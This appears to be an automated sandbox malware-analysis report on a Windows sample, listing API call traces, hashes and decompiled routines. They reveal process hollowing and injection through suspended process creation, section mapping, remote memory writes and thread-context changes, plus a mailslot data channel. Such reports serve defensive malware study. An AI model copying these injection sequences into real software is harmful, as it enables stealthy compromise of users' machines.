Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory

Similarity

Total matches: 162
API ID: CreateProcessGetLastErrorHeapFreememset
String ID: D
API String ID: 1501718689-2746444292
Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8

APIs

memset.NTDLL ref: 002E13B5

Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
GetLastError.KERNEL32(00000001), ref: 002E1422
HeapFree.KERNEL32(00000000,00000000), ref: 002E1433

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

Strings

D, xrefs: 002E13CE

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 58680

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	13FFE10E12298A4E8DC1EE7A0B003B93
Total matches:	34
Initial Analysis Report:	Open
Initial sample Analysis ID:	58680
Initial sample SHA 256:	75D846C690C188A3CC6A2E226FDD42AF8A1351B07FB56795106285178B0A0AA7
Initial sample name:	sample.exe

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

